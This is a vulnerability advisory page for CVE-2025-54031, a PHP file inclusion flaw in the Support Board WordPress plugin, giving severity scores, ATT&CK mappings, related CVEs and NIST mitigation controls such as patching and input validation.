Cyber Resilience

CVE-2025-54031

High

Published: 20 August 2025

Published
20 August 2025
Modified
23 April 2026
KEV Added
Patch
CVSS Score v3.1 8.1 CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0016 36.4th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-54031 is a high-severity PHP Remote File Inclusion (CWE-98) vulnerability. Its CVSS base score is 8.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 36.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2025-54031 is an Improper Control of Filename for Include/Require Statement in PHP Program vulnerability, known as PHP Remote File Inclusion, which allows PHP Local File Inclusion in the Schiocco Support Board WordPress plugin. This issue affects Support Board versions from n/a through <= 3.8.0. The vulnerability is associated with CWE-98 and has a CVSS v3.1 base score of 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).

Remote, unauthenticated attackers can exploit this vulnerability over the network, though it requires high attack complexity and no user interaction. Successful exploitation enables high-impact compromise of confidentiality, integrity, and availability, potentially allowing attackers to read sensitive local files or execute arbitrary code depending on the inclusion mechanism.

Patchstack provides details on this WordPress plugin vulnerability, including mitigation guidance, in its database entry at https://patchstack.com/database/Wordpress/Plugin/supportboard/vulnerability/wordpress-support-board-3-8-0-local-file-inclusion-vulnerability?_s_id=cve. The vulnerability was published on 2025-08-20T08:15:46.730.

EU & UK References

Vulnerability details

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Schiocco Support Board supportboard allows PHP Local File Inclusion.This issue affects Support Board: from n/a through <= 3.8.0.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1505.003 Web Shell Persistence
Adversaries may backdoor web servers with web shells to establish persistent access to systems.
Why these techniques?

LFI/RFI in public-facing WordPress plugin directly enables T1190 exploitation and arbitrary PHP code execution via web shell inclusion (T1505.003).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2024-13408Shared CWE-98
CVE-2026-39387Shared CWE-98
CVE-2026-3425Shared CWE-98
CVE-2026-27383Shared CWE-98
CVE-2024-51319Shared CWE-98
CVE-2025-30845Shared CWE-98
CVE-2025-26985Shared CWE-98
CVE-2025-52732Shared CWE-98
CVE-2025-69078Shared CWE-98
CVE-2026-24538Shared CWE-98

Affected Assets

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mitigates the CVE by requiring timely patching of the vulnerable Schiocco Support Board WordPress plugin versions <=3.8.0 to fix the improper filename control in PHP include/require statements.

prevent

Enforces validation of user-supplied filenames and inputs to the PHP include/require functions, preventing local file inclusion exploitation as described in CWE-98.

prevent

Establishes secure configuration settings for PHP such as open_basedir restrictions and disabling remote file inclusion to limit the scope of file access in vulnerable plugins.

References